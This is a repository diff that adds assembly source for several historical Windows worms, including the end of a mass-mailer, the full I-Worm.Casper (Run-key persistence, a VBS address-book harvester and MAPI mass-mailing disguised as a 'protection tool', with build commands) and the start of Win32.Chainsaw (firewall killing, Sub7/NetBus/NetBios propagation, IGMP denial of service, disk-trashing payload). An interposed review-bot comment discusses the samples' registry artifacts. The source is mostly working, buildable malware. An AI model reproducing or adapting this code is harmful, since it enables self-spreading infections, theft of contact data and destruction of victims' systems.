512 +push offset rB +push sock +call recv + +push offset RCPT +call lstrlen + +push 0 +push eax +push offset RCPT +push sock +call send + +push 20 +call Sleep +push 0 +push 512 +push offset rB +push sock +call recv + +push 0 +push 6 +push offset _DATA_ +push sock +call send + +push 20 +call Sleep +push 0 +push 512 +push offset rB +push sock +call recv + +push offset base_buffer +call lstrlen + +push 0 +push eax +push offset base_buffer +push sock +call send + + +push 0 +push 3 +push offset dot +push sock +call send + +push 20 +call Sleep +push 0 +push 512 +push offset rB +push sock +call recv + +push 0 +push 6 +push offset QUIT +push sock +call send + +push sock +call closesocket + +call WSACleanup + +push offset sep +push offset RCPT +call lstrcpy + +push 5000 +call Sleep + +call @NEXT_MAILL + +@EX: + +push sock +call closesocket +push 0h +call ExitProcess + +@CLEAN: +call WSACleanup +push 0h +call @EXIT + + + +@EXIT: +push offset payday +push offset payyes +call lstrcmp +cmp eax,0 +je @HANG_ALL_CONNECTIoNZ +jne _STAY_IN_MEM + + +_STAY_IN_MEM: +push 50000 +call Sleep +call _STAY_IN_MEM + +@BUFFER_OVERFLOW: +call GetActiveWindow ;zabijamy aktywne okno przypuszczalnie debugger +mov edx,eax ;nieskonczona petla powoduje blad w kernelu +push 0 ;plik robaka bedzie dostepny po resecie systemu ;)) +push 0 +push 12h +push edx +call PostMessageA +CALL @BUFFER_OVERFLOW + +@HEART_STOPS: +push 1 +push offset markerr +call WinExec + +push 100 +call Sleep + +call @BUFFER_OVERFLOW + +@RUN_SYS_FILE: +push 256 +push offset sysDD +call GetSystemDirectoryA + +push offset sysDD +call SetCurrentDirectoryA + +push 500 +call Sleep + +push 1 +push offset sysD +call WinExec + +push dword ptr [mutexH] +call ReleaseMutex + +push 0h +call ExitProcess + + +@HANG_ALL_CONNECTIoNZ: + +push 500 ;timer +call Sleep + +push offset wininet_lib +call LoadLibraryA + +push offset hang_connection +push eax +call GetProcAddress +xchg eax,ecx + +push 0h ;kiss me goodbye ;) +push offset lpdwFlagz ;I don`t 
know that this WININET +call ecx ;function is working ;) Refer +call @HANG_ALL_CONNECTIoNZ ;to Jacob Navia it should be. + ;[*Nice 'WININET' Ref ;) Big Thx :*] +End Kakaroth +;================================================================================================ +; +1679 linez of asm c0de ;)) ? I did it ? he he ... +; +;================================================================================================ +;***** This is the end of your jurney... Sorry about commentz...i know - my english skillz. ***** +;================================================================================================ +; eEEEEEe nNn Nn dDDDd #+ +; EE NNnN nN Dd dD #+ +; EEEe nN nN nN dD dD #+ +; EE NN nN nN Dd dD #+ +; eEEEEEe nN nNNn dDDDd #+ +; #+ +; -= .: CoDinG is No7 a CrIm3 :. =- #+ +;================================================================================================ \ No newline at end of file diff --git a/Win32/I-Worm.Casper.asm b/Win32/I-Worm.Casper.asm new file mode 100644 index 00000000..c11ac415 --- /dev/null +++ b/Win32/I-Worm.Casper.asm 
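Review bot: The registry artifacts this sample leaves are not documented anywhere in the header, and the quoted vendor write-up should not be taken as the IoC list: the code creates a marker key `Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\silent_thunder` via `RegCreateKeyA` (and exits early if `RegOpenKeyA` already finds it), while both `HKEY_LOCAL_MACHINE equ 80000001h` and `HKEY_CURRENT_USER equ 80000001h` are given the same value, so every `RegOpenKeyExA`/`RegCreateKeyA` call lands on the hive that 80000001h denotes (HKEY_CURRENT_USER) regardless of which symbol the source names. Persistence is the WIN.INI `run=` entry written with `WriteProfileStringA`, which the header does describe. The rest of the `Win32/` entries in this commit are `.7z` archives, but this file is plain, directly assemblable text; for a sample corpus it would be consistent and safer to store it the same way and record its hash in a README, so a clone is neither quarantined by AV nor built by accident. A one-line header note such as `; Analysis sample; embedded vendor description is incomplete (see HKEY_* equates and the silent_thunder marker key)` would point the next analyst at the discrepancy.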
@@ -0,0 +1,510 @@ +;--- dllz.def +IMPORTS + + WININET.InternetGetConnectedState + SHLWAPI.SHSetValueA +;--- + + +comment # +Name : I-Worm.Casper +Author : PetiK +Date : August 17th - August 24th +Size : 6144 byte (compressed with UPX tool) + +Action : Copy itself to + * WINDOWS\MsWinsock32.exe + Add in the key HKLM\Software\Microsoft\Windows\CurrentVersion\Run the value + * Winsock32 1.0 = WINDOWS\MsWinsock32.exe + + +To build the worm: +tasm32 /ml /m9 Casper +tlink32 -Tpe -c -x -aa Casper,,,import32,dllz +upx -9 Casper.exe + +To delete the worm: +del %windir%\MsWinsock32.exe +del %windir%\CasperEMail.txt + +dllz.def file: +IMPORTS + + WININET.InternetGetConnectedState + SHLWAPI.SHSetValueA + + +# + +.586p +.model flat +.code + +JUMPS + +callx macro a +extrn a:proc +call a +endm + +include useful.inc + +DEBUT: +Main_Worm: + + call Hide_Worm + call Copy_Worm + call Check_Wsock + call Prepare_Spread_Worm + + Connected_: + push 00h + push offset Tmp + callx InternetGetConnectedState + dec eax + jnz Connected_ + + mov edi,offset casper_mail + push edi + push 50 + push edi + callx GetWindowsDirectoryA + add edi,eax + mov eax,"saC\" + stosd + mov eax,"Erep" + stosd + mov eax,"liaM" + stosd + mov eax,"txt." + stosd + xor eax,eax + stosd + + call Spread_Worm + +Hide_Worm proc + pushad + @pushsz "Kernel32.dll" + callx GetModuleHandleA + xchg eax,ecx + jecxz End_Hide + @pushsz "RegisterServiceProcess" + push ecx + callx GetProcAddress + xchg eax,ecx + jecxz End_Hide + push 1 + push 0 + call ecx + End_Hide: + popad + ret +Hide_Worm endp + +Check_Wsock proc + Search_Wsock: + push 50 + mov edi,offset wsock_file + push edi + callx GetSystemDirectoryA + add edi,eax + mov eax,"osW\" + stosd + mov eax,"23kc" + stosd + mov eax,"lld." 
+ stosd + xor eax,eax + stosd + + push offset wsock_file + callx GetFileAttributesA + cmp eax,20h + jne End_Wsock + + xor eax,eax + push eax + push eax + push 03h + push eax + push eax + push 80000000h or 40000000h + push offset wsock_file + callx CreateFileA + mov wsckhdl,eax + + File_Mapping: + xor eax,eax + push eax + push eax + push eax + push 04h + push eax + push wsckhdl + callx CreateFileMappingA + test eax,eax + jz Close_File + mov wsckmap,eax + + xor eax,eax + push eax + push eax + push eax + push 06h + push wsckmap + callx MapViewOfFile + test eax,eax + jz Close_Map_File + mov esi,eax + mov wsckview,eax + + Old_Infect: + mov verif,0 + cmp word ptr [esi],"ZM" + jne UnmapView_File + cmp byte ptr [esi+12h],"z" + je Infected_By_Happy + cmp word ptr [esi+38h],"ll" + je Infected_By_Icecubes + jmp UnmapView_File + + Infected_By_Happy: + push 10h + push offset warning + @pushsz "I-Worm.Happy coded by Spanska" + push 00h + callx MessageBoxA + inc verif + jmp UnmapViewOfFile + Infected_By_Icecubes: + push 10h + push offset warning + @pushsz "I-Worm.Icecubes coded by f0re" + push 00h + callx MessageBoxA + inc verif + jmp UnmapViewOfFile + Already_Infected: + inc verif + jmp UnmapViewOfFile + + UnmapView_File: + push wsckview + callx UnmapViewOfFile + Close_Map_File: + push offset wsckmap + callx CloseHandle + Close_File: + push wsckhdl + callx CloseHandle + End_Wsock: + ret +Check_Wsock endp + +Copy_Worm proc + pushad + Original_Name: + push 50 + mov esi,offset original + push esi + push 0 + callx GetModuleFileNameA + + Copy_Name: + mov edi,offset copy_name + push edi + push 50 + push edi + callx GetWindowsDirectoryA + add edi,eax + mov eax,'WsM\' + stosd + mov eax,'osni' + stosd + mov eax,'23kc' + stosd + mov eax,'exe.' 
+ stosd + pop edi + push 0 + push edi + push esi + callx CopyFileA + + Reg_Registered: + push 08h + push edi + push 01h + @pushsz "Winsock32" + @pushsz "Software\Microsoft\Windows\CurrentVersion\Run" + push 80000002h + callx SHSetValueA + push 08h + @pushsz "PetiK - France - (c)2001" + push 01h + @pushsz "Author" + @pushsz "Software\CasperWorm" + push 80000001h + callx SHSetValueA + push 08h + @pushsz "1.00" + push 01h + @pushsz "Version" + @pushsz "Software\CasperWorm" + push 80000001h + callx SHSetValueA + popad + ret +Copy_Worm endp + + +Prepare_Spread_Worm proc + pushad + push 00h + push 80h + push 02h + push 00h + push 01h + push 40000000h + @pushsz "C:\CasperMail.vbs" + callx CreateFileA + xchg edi,eax + push 00h + push offset octets + push VBSSIZE + push offset vbsd + push edi + callx WriteFile + push edi + callx CloseHandle + push 1 + @pushsz "wscript C:\CasperMail.vbs" + callx WinExec + push 3 * 1000 + callx Sleep + @pushsz "C:\CasperMail.vbs" + callx DeleteFileA + popad + ret +Prepare_Spread_Worm endp + + Spread_Worm: + pushad + push 00h + push 80h + push 03h + push 00h + push 01h + push 80000000h + push offset casper_mail + callx CreateFileA + inc eax + test eax,eax + je End_Spread_worm + dec eax + xchg eax,ebx + + xor eax,eax + push eax + push eax + push eax + push 02h + push eax + push ebx + callx CreateFileMappingA + test eax,eax + je F1 + xchg eax,ebp + + xor eax,eax + push eax + push eax + push eax + push 04h + push ebp + callx MapViewOfFile + test eax,eax + je F2 + xchg eax,esi + + push 00h + push ebx + callx GetFileSize + cmp eax,03h + jbe F3 + + call Scan_Mail + + F3: push esi + callx UnmapViewOfFile + F2: push ebp + callx CloseHandle + F1: push ebx + callx CloseHandle + End_Spread_worm: + popad + ret + + Scan_Mail: + pushad + xor edx,edx + mov edi,offset m_addr + push edi + p_c: lodsb + cmp al," " + je car_s + cmp al,0dh + je entr1 + cmp al,0ah + je entr2 + cmp al,"#" + je f_mail + cmp al,"@" + je not_a + inc edx + not_a: stosb + jmp p_c + 
car_s: inc esi + jmp p_c + entr1: xor al,al + stosb + pop edi + test edx,edx + je Scan_Mail + call Send_Mail + jmp Scan_Mail + entr2: xor al,al + stosb + pop edi + jmp Scan_Mail + f_mail: + FIN: push 00h + callx ExitProcess + + Send_Mail: + xor eax,eax + push eax + push eax + push eax + push offset Message + push [MAPIHdl] + callx MAPISendMail + ret + + +.data +; ===== Main_Worm ===== +wsock_file db 50 dup (0) + +; ===== Check_Wsock ===== +wsckhdl dd 0 +wsckmap dd 0 +wsckview dd 0 +PEHeader dd 0 +warning db "Warning : You're infected by",00h +verif dd ? + +; ===== Copy_Worm ===== +original db 50 dup (0) +copy_name db 50 dup (0) + +; ===== Prepare_Spread_Worm ===== +octets dd ? + +; ===== Spread_Worm ===== +m_addr db 128 dup (?) +casper_mail db 50 dup (0) +mail_name db "Casper_Tool.exe",00h +MAPIHdl dd 0 +Tmp dd 0 + +subject db "Casper Tool Protect 1.00",00h +body db "Hi,",0dh,0ah + db "Look at this attachment...",0dh,0ah + db "This freeware alert you if you infected by " + db "I-Worm.Happy and I-Worm.Icecubes.",0dh,0ah + db "These worms spread with the file WSOCK32.DLL in the SYSTEM path.",0dh,0ah + db "The tool Casper v.1.00 scans this specific file and displays a message " + db "if it infected.",0dh,0ah,0dh,0ah,0dh,0ah + db 09h,09h,09h,"Good Bye and have a nice day",00h + +Message dd ? + dd offset subject + dd offset body + dd ? + dd ? + dd ? + dd 2 + dd offset MsgFrom + dd 1 + dd offset MsgTo + dd 1 + dd offset Attach + +MsgFrom dd ? + dd ? + dd ? + dd ? + dd ? + dd ? + +MsgTo dd ? + dd 1 + dd offset m_addr + dd offset m_addr + dd ? + dd ? + +Attach dd ? + dd ? + dd ? + dd offset original + dd offset mail_name + dd ? 
+ +vbsd: +db 'On Error Resume Next',0dh,0ah +db 'Set Casper = CreateObject("Outlook.Application")',0dh,0ah +db 'Set L = Casper.GetNameSpace("MAPI")',0dh,0ah +db 'Set fs=CreateObject("Scripting.FileSystemObject")',0dh,0ah +db 'Set c=fs.CreateTextFile(fs.GetSpecialFolder(0)&"\CasperEMail.txt")',0dh,0ah +db 'c.Close',0dh,0ah +db 'For Each M In L.AddressLists',0dh,0ah +db 'If M.AddressEntries.Count <> 0 Then',0dh,0ah +db 'For O = 1 To M.AddressEntries.Count',0dh,0ah +db 'Set P = M.AddressEntries(O)',0dh,0ah +db 'Set c=fs.OpenTextFile(fs.GetSpecialFolder(0)&"\CasperEMail.txt",8,true)',0dh,0ah +db 'c.WriteLine P.Address',0dh,0ah +db 'c.Close',0dh,0ah +db 'Next',0dh,0ah +db 'End If',0dh,0ah +db 'Next',0dh,0ah +db 'Set c=fs.OpenTextFile(fs.GetSpecialFolder(0)&"\CasperEMail.txt",8,true)',0dh,0ah +db 'c.WriteLine "#"',0dh,0ah +db 'c.Close',0dh,0ah +VBSSIZE = $-vbsd + +MAX_PATH equ 260 +FILETIME struct +dwLowDateTime dd ? +dwHighDateTime dd ? +FILETIME ends +WIN32_FIND_DATA struct +dwFileAttributes dd ? +ftCreationTime FILETIME ? +ftLastAccessTime FILETIME ? +ftLastWriteTime FILETIME ? +nFileSizeHigh dd ? +nFileSizeLow dd ? +dwReserved0 dd ? +dwReserved1 dd ? +cFileName dd MAX_PATH (?) +cAlternateFileName db 13 dup (?) + db 3 dup (?) +WIN32_FIND_DATA ends + +Search WIN32_FIND_DATA <> + +end DEBUT +end \ No newline at end of file diff --git a/Win32/I-Worm.Chainsaw.asm b/Win32/I-Worm.Chainsaw.asm new file mode 100644 index 00000000..81c4151f --- /dev/null +++ b/Win32/I-Worm.Chainsaw.asm 
@@ -0,0 +1,1598 @@ + +[CHAINSAW.ASM] +; AVP description. +; --------------------------------------------------------------------------- +; Worm.Chainsaw +; +; This is a network worm with Internet spreading ability. When the worm +; is run on a system for the first time, it installs itself. To do that it +; copies itself to the Windows system directory using the filename +; WINMINE.EXE and also to the root directory of the current drive using the +; filename CHAINSAW.EXE. The latter file then gets "hidden" attribute set. +; The worm then registers itself in the system registry, auto-run key: +; +; HKCU\Software\Microsoft\Windows\CurrentVersion\Run +; Mines = path\WINMINE.EXE +; +; where "path" is the Windows system directory name. The worm then exits and +; triggers its infection routines when run during the next Windows startup. +; +; During the next Windows startup the worm is automatically executed by +; Windows by an auto-run key in the system registry. The worm then registers +; itself as hidden application and runs its spreading routine. That routine +; enumerates shared drives on the local networks [* It doesn't even get near +; local shares. *], gets the Windows directory on a drive (if there is one), +; copies itself to there using the filename CHAINSAW.EXE (if the drive is +; mapped for full access) and registers itself in there by writing the "Run=" +; instruction to the [windows] section of the WIN.INI file on the remote +; drive. During the next Windows restart the worm copy will be activated and +; will complete the infection. +; +; When the worm is started it sends a notifying message to the +; "alt.horror" conference. The message has the fields: +; +; 
From: "Leatherface" +; Subject: CHAINSAWED +; Newsgroups: alt.horror +; Message body: +; +; WHO WILL SURVIVE +; AND WHAT WILL BE LEFT OF THEM? +; +; The worm also tries to send its copies to remote machines. To do that it +; gets randomly selected IP addresses in an endless loop and tries to connect +; to them. If it succeeds the worm tries to connect to a "Backdoor" trojan +; program on the remote machine (if the machine is infected by a backdoor +; program). After successfully connecting, the worm sends its copy to the +; remote machine and forces the Backdoor to execute it there. The list of +; "supported" Backdoors is as follows: Sub7, NetBus, NetBios. It's obvious +; that the worm has a very low chance to spread itself in such a way [* +; Several worms such as VBS/NetLog and W32/Qaz use *only* NetBios to spread, +; and are currently in the wild in large numbers, try to explain me this +; then. *] +; +; Depending on the system date the worm also sends a "Deny-of-service" +; packet to a randomly selected IP address. That packet is prepared so that +; it may cause a remote Win9x machine to crash (because of a bug in Win9x +; libraries). The worm intends to do that on the 31th of the month, but +; because of a bug compares that value with "year" field, and as a result +; will bomb random selected machines only if tje system date is set to the +; year 0031 [* Oops! Well atleast this version has it fixed :*] +; +; The worm also disables the "ZoneAlarm" Internet protection utility. +; +; Depending on its random counter the worm spawns a trojan program that +; erases data on the hard drive by writing the text to there: +; +; "THE FILM WHICH YOU ARE ABOUT TO SEE IS AN ACCOUNT OF THE +; TRAGEDY WHICH BEFELL A GROUP OF FIVE YOUTHS. IN PARTICULAR +; SALLY HARDESTY AND HER INVALID BROTHER FRANKLIN. IT IS ALL +; THE MORE TRAGIC IN THAT THEY WERE YOUNG. 
BUT, HAD THEY +; LIVED VERY, VERY LONG LIVES, THEY COULD NOT HAVE EXPECTED +; NOR WOULD THEY HAVE WISHED TO SEE AS MUCH OF THE MAD AND +; MACABRE AS THEY WERE TO SEE THAT DAY. FOR THEM AN IDYLLIC +; SUMMER AFTERNOON DRIVE BECAME A NIGHTMARE. THE EVENTS OF +; THAT DAY WERE TO LEAD TO THE DISCOVERY OF ONE OF THE MOST +; BIZARRE CRIMES IN THE ANNALS OF AMERICAN HISTORY, +; THE TEXAS CHAIN SAW MASSACRE..." +; --------------------------------------------------------------------------- + +;============================================================================ +; +; +; NAME: Win32.Chainsaw v1.01 +; TYPE: NetBios/SubSeven/NetBus worm. +; DATE: July - September 2000. +; AUTHOR: T-2000 / Immortal Riot. +; E-MAIL: T2000_@hotmail.com +; PAYLOAD: Sector trashing. +; +; FEATURES: +; +; - Disables ZoneAlarm firewall. +; - Not visible in 9x tasklist. +; - Sends usenet message on installation. +; - DoS'es random hosts on 31st of any month. +; - Anti-debugging code. +; +; Randomly scans the Internet for hosts running either SubSeven 2, NetBus 1, +; or NetBios, and then installs itself in the systems it can get access +; to. It's main payload is to IGMP DoS random Internet hosts on every 31st +; of the month, which will BSOD every released version of Windoze 95/98 +; that isn't patched or firewalled. +; +;============================================================================ + +; I've kept the code clear and understandable for everyone, no optimizations +; of any kind, mainly due the file alignment, the filesize will usually just +; stay the same wether your code is optimized or not. + + .386 + .MODEL FLAT + .DATA + + JUMPS + +; Converts a little indian word to a big indian word. 
+DWBI MACRO Lil_Indian + DW (Lil_Indian SHR 8) + ((Lil_Indian AND 00FFh) SHL 8) +ENDM + + +EXTRN WSAGetLastError:PROC +EXTRN ioctlsocket:PROC +EXTRN ExitProcess:PROC +EXTRN WSAStartup:PROC +EXTRN WritePrivateProfileStringA:PROC +EXTRN WSACleanup:PROC +EXTRN socket:PROC +EXTRN closesocket:PROC +EXTRN setsockopt:PROC +EXTRN InternetGetConnectedState:PROC +EXTRN DeleteFileA:PROC +EXTRN connect:PROC +EXTRN setsockopt:PROC +EXTRN PeekMessageA:PROC +EXTRN SetFileAttributesA:PROC +EXTRN GetSystemDirectoryA:PROC +EXTRN CreateFileA:PROC +EXTRN recv:PROC +EXTRN send:PROC +EXTRN sendto:PROC +EXTRN CloseHandle:PROC +EXTRN GetSystemTime:PROC +EXTRN GetModuleHandle +EXTRN RegOpenKeyExA:PROC +EXTRN RegSetValueExA:PROC +EXTRN RegCloseKey:PROC +EXTRN ReadFile:PROC +EXTRN CopyFileA:PROC +EXTRN WNetAddConnection2A:PROC +EXTRN WNetCancelConnection2A:PROC +EXTRN SetErrorMode:PROC +EXTRN GetModuleFileNameA:PROC +EXTRN FindWindowA:PROC +EXTRN PostMessageA:PROC +EXTRN GetTickCount:PROC +EXTRN WriteFile:PROC +EXTRN GetLocalTime:PROC +EXTRN WinExec:PROC +EXTRN select:PROC +EXTRN GetPrivateProfileStringA:PROC +EXTRN GetModuleHandleA:PROC +EXTRN GetProcAddress:PROC +EXTRN WNetAddConnection2A:PROC +EXTRN WNetEnumResourceA:PROC +EXTRN WNetOpenEnumA:PROC +EXTRN WNetCloseEnum:PROC +EXTRN RegQueryValueExA:PROC +EXTRN gethostbyname:PROC +EXTRN inet_ntoa:PROC + + +Worm_Size EQU 6144 + +SEM_NOGPFAULTERRORBOX EQU 00000002h +OPEN_EXISTING EQU 00000003h +CREATE_ALWAYS EQU 00000002h +SO_SNDTIMEO EQU 1005h +SO_RCVTIMEO EQU 1006h +RESOURCE_GLOBALNET EQU 00000002h +RESOURCEUSAGE_CONNECTABLE EQU 00000001h +RESOURCEUSAGE_CONTAINER EQU 00000002h +RESOURCEUSAGE_CONNECTABLE EQU 00000001h +RESOURCETYPE_DISK EQU 00000001h +SOL_SOCKET EQU 0FFFFh +HKEY_CURRENT_USER EQU 80000001h +KEY_QUERY_VALUE EQU 1 +KEY_WRITE EQU 00020006h +REG_SZ EQU 00000001h +GENERIC_READ EQU 80000000h +GENERIC_WRITE EQU 40000000h +FILE_SHARE_READ EQU 00000001h +FILE_ATTRIBUTE_HIDDEN EQU 2 +AF_INET EQU 2 +IPPROTO_IGMP EQU 2 +SOCK_STREAM EQU 1 
+SOCK_RAW EQU 3 +FIONBIO EQU 8004667Eh +WM_QUIT EQU 0012h + + +S7_Upload_Req DB 'RTFChainsaw.exe' +End_S7_Upload_Req: + +S7_Upload_Size DB 'SFT046144' +End_S7_Upload_Size: + +S7_Exec_Req DB 'FMXChainsaw.exe' +End_S7_Exec_Req: + +NB_Password DB 'Password;1;netbus', 0Dh +End_NB_Password: + +NB_Upload_Req DB 'UploadFile;Chainsaw.exe;6144;\', 0Dh +End_NB_Upload_Req: + +NB_Exec_File DB 'StartApp;\Chainsaw.exe', 0Dh +End_NB_Exec_File: + +Nuke_File DB 'BBQ666.COM', 0 + +sz_Kernel32 DB 'KERNEL32', 0 +sz_RegServProc DB 'RegisterServiceProcess', 0 + +Win_Ini_Run_Key DB 'run', 0 +Windows_Section DB 'windows', 0 + +Run_Key DB 'Software\Microsoft\Windows\CurrentVersion\Run', 0 +ZoneAlarm_Window DB 'ZoneAlarm', 0 + +Reg_Handle_1 DD 0 +Reg_Handle_2 DD 0 +sz_Account_Mgr DB 'Software\Microsoft\Internet Account Manager', 0 +Account_Key DB 'Software\Microsoft\Internet Account Manager\Accounts\' +Account_Index DB '00000000', 0 +sz_Def_News_Acc DB 'Default News Account', 0 +sz_NNTP_Server DB 'NNTP Server', 0 + +Size_Acc_Buffer DD 9 +Size_NNTP_Buf DD 128 + +s_POST DB 'POST', 0Dh, 0Ah +s_QUIT DB 'QUIT', 0Dh, 0Ah + + ; Header. + +News_Message: DB 'From: "Leatherface" ', 0Dh, 0Ah + DB 'Subject: CHAINSAWED', 0Dh, 0Ah + DB 'Newsgroups: alt.horror', 0Dh, 0Ah + DB 0Dh, 0Ah + + ; Body. + + DB 'WHO WILL SURVIVE', 0Dh, 0Ah + DB 'AND WHAT WILL BE LEFT OF THEM?', 0Dh, 0Ah + + ; End-of-data command. + + DB '.', 0Dh, 0Ah +End_News_Message: + +MsDos_Sys DB 'T:\MSDOS.SYS', 0 +Win_Dir_Key DB 'WinDir', 0 +Paths_Section DB 'Paths', 0 + +Slash_Win_Ini DB '\' +Win_Ini DB 'WIN.INI', 0 + +Remote_Drive DB 'T:', 0 +Cover_Name DB '\WINMINE.EXE', 0 + +Remote_Trojan DB 'T:' +Root_Dropper DB '\Chainsaw.exe', 0 +Run_Key_Name DB 'Mines', 0 + +Boole_False DD 0 +Boole_True DD 1 + +NetBios_Remote DB '\\666.666.666.666', 0 + +Time_Out: DD 1 ; - Seconds. + DD 500 ; - Milliseconds. + +IO_Time_Out DD 5000 + +Usenet_Conn: DW AF_INET ; connect() structures. 
+ DWBI 119 +Usenet_IP DD 0 + DB 8 DUP(0) + +Nuke_Conn: DW AF_INET + DW 0 +Nuke_IP DD 0 + DB 8 DUP(0) + +Sub7_Conn: DW AF_INET + DWBI 27374 +Sub7_IP DD 0 + DB 8 DUP(0) + +NetBus_Conn: DW AF_INET + DWBI 12345 +NetBus_IP DD 0 + DB 8 DUP(0) + +NetBus_Conn_2: DW AF_INET + DWBI (12345+1) +NetBus_IP_2 DD 0 + DB 8 DUP(0) + +NetBios_Conn: DW AF_INET + DWBI 139 +NetBios_IP DD 0 + DB 8 DUP(0) + +Win_Dir DB 260 DUP(0) +Default_String DB 0 + +Own_Path DB 260 DUP(0) + +Net_Struc_Count DD 1 +Enum_Buf_Size DD 666 +Enum_Buffer DB 666 DUP(0) + +Net_Resource_Struc: + + DD 0 + DD 0 + DD 0 + DD 0 + DD 0 + DD OFFSET NetBios_Remote + DD 0 + DD 0 + +Net_Resource: DD 0 + DD 0 + DD 0 +Net_Usage DD 0 +Net_Local_Name DD 0 +Net_Remote_Name DD 0 + DD 0 + DD 0 + +Select_Struc: +Sock_Count DD 3 +Sub7_Socket DD 0 +NetBus_Socket DD 0 +NetBios_Socket DD 0 + +IGMP_Socket DD 0 +News_Socket DD 0 +NetBus_Socket_2 DD 0 + +Connect_Select: DD 4 DUP(0) + +IGMP_Nuke DB 15000 DUP(0) + +Temp DD 0 +Random_Init DD 0 + +Enum_Handle DD 0 + +Size_Cover_Path DD 0 + +System_Time DW 8 DUP(0) + +Worm_Code DB Worm_Size DUP(0) +WSA_Data DB 400 DUP(0) +System_Dir DB 260 DUP(0) +NNTP_Server DB 128 DUP(0) +Buffer DB 512 DUP(0) + + .CODE + + DB '[-T2IR-]', 0 +START: + PUSH SEM_NOGPFAULTERRORBOX ; On error just bail out + CALL SetErrorMode ; without displaying shit. + + PUSH 0 ; Fake a dispatch to get the + PUSH 0 ; hourglass cursor to + PUSH 0 ; disappear. + PUSH 0 + PUSH 0 + CALL PeekMessageA + + ; Get offset of CreateFileA in the jump table. + + MOV ESI, DWORD PTR CreateFileA+2 + LODSD + + ; Soft-Ice's BPX command works with 0CCh breakpoints + ; to hook API's, so here we simply check if a common + ; API has been hooked and kill the system if true. + ; For a virus it's better to check every fetched API + ; for a debugger hook. + + CMP BYTE PTR [ESI], 0CCh ; Debugger has a hook on it? + JE Payload + + CALL GetTickCount + + MOV Random_Init, EAX + + PUSH 260 ; Get the path to ourself. 
+ PUSH OFFSET Own_Path + PUSH 0 + CALL GetModuleFileNameA + + MOV EDI, OFFSET System_Dir + + PUSH 260 ; Get the System directory. + PUSH EDI + CALL GetSystemDirectoryA + + MOV ESI, OFFSET Cover_Name + ADD EDI, EAX + + MOVSD ; Append our cover name + MOVSD ; \WINMINE.EXE to it. + MOVSD + MOVSB + + SUB EDI, OFFSET System_Dir ; Save size of path. + MOV Size_Cover_Path, EDI + + PUSH 1 ; Copy us to the system + PUSH OFFSET System_Dir ; directory under the cover + PUSH OFFSET Own_Path ; name. + CALL CopyFileA + + XCHG ECX, EAX ; Virus is already installed? + JECXZ Check_Trigger + + PUSH 1 ; Copy root dropper to root + PUSH OFFSET Root_Dropper ; to indicate this is the 1st + PUSH OFFSET Own_Path ; run of the worm. + CALL CopyFileA + + PUSH FILE_ATTRIBUTE_HIDDEN ; Hide it. + PUSH OFFSET Root_Dropper + CALL SetFileAttributesA + + PUSH OFFSET Reg_Handle_1 ; Open up a handle to the + PUSH KEY_WRITE ; registry Run key. + PUSH 0 + PUSH OFFSET Run_Key + PUSH HKEY_CURRENT_USER + CALL RegOpenKeyExA + + PUSH Size_Cover_Path ; Make the cover file run + PUSH OFFSET System_Dir ; every bootup. + PUSH REG_SZ + PUSH 0 + PUSH OFFSET Run_Key_Name + PUSH Reg_Handle_1 + CALL RegSetValueExA + + PUSH Reg_Handle_1 ; Close registry key. + CALL RegCloseKey + + PUSH OFFSET Win_Ini ; Remove temporary reference + PUSH 0 ; to virus dropper in + PUSH OFFSET Win_Ini_Run_Key ; WIN.INI. + PUSH OFFSET Windows_Section + CALL WritePrivateProfileStringA + +Exit: PUSH 0 + CALL ExitProcess + +Check_Trigger: MOV EAX, 666 ; 1/666 chance of activating. + CALL Random_EAX + + DEC EAX ; Today is trashday? + JZ Payload + + PUSH 0 ; Open ourselves. + PUSH 0 + PUSH OPEN_EXISTING + PUSH 0 + PUSH FILE_SHARE_READ + PUSH GENERIC_READ + PUSH OFFSET Own_Path + CALL CreateFileA + + MOV EBX, EAX + + INC EAX + JZ Exit + + PUSH 0 ; Read in ourselves. + PUSH OFFSET Temp + PUSH Worm_Size+1 + PUSH OFFSET Worm_Code + PUSH EBX + CALL ReadFile + + CMP Temp, Worm_Size ; Wormsize has changed? 
+ JNE Payload ; Then we're likely + ; incomplete or infected + ; with a virus. + + PUSH EBX ; Close ourselves again. + CALL CloseHandle + + PUSH OFFSET sz_Kernel32 ; Get base of KERNEL32.DLL. + CALL GetModuleHandleA + + PUSH OFFSET sz_RegServProc ; Get RegisterServiceProcess. + PUSH EAX + CALL GetProcAddress + + XCHG ECX, EAX + JECXZ Init_Winsock + + PUSH 1 ; Register our process as a + PUSH 0 ; hidden service. + CALL ECX + +Init_Winsock: PUSH OFFSET WSA_Data ; Initialize winsock. + PUSH 0202h + CALL WSAStartup + + OR EAX, EAX ; Error? + JNZ Exit + +Chk_Inet_State: PUSH 0 ; We're connected to the + PUSH OFFSET Temp ; Internet? + CALL InternetGetConnectedState + + DEC EAX ; Else just loop and check + JNZ Chk_Inet_State ; again until we are. + + ; Here we close the ZoneAlarm firewall if it is + ; found active, reason being that A) it will pop-up + ; a warning box whenever a program (ie. our worm) + ; is attempting to access the Internet, (this is how + ; many RAT trojans get caught these days) and B) it + ; is likely to block our ports. + + PUSH OFFSET ZoneAlarm_Window ; Attempt to locate the + PUSH 0 ; ZoneAlarm window. + CALL FindWindowA + + XCHG ECX, EAX + JECXZ Check_1st_Run + + PUSH 0 ; Tell ZoneAlarm to quit. + PUSH 0 + PUSH WM_QUIT + PUSH ECX + CALL PostMessageA + +Check_1st_Run: PUSH OFFSET Root_Dropper ; Can we delete the root + CALL DeleteFileA ; dropper? + + XCHG ECX, EAX + JECXZ Do_Random_IP + + ; This is the first Internet run of the worm, so + ; send a usenet message to alt.horror to note + ; our presence. Better to just use a public + ; dump place instead of e-mail for example, this + ; way they can't track you or kill the account. + + PUSH OFFSET Reg_Handle_1 ; Open a handle to Internet + PUSH KEY_QUERY_VALUE ; Account Manager. + PUSH 0 + PUSH OFFSET sz_Account_Mgr + PUSH HKEY_CURRENT_USER + CALL RegOpenKeyExA + + OR EAX, EAX + JNZ Do_Random_IP + + PUSH OFFSET Size_Acc_Buffer ; Get default news account. 
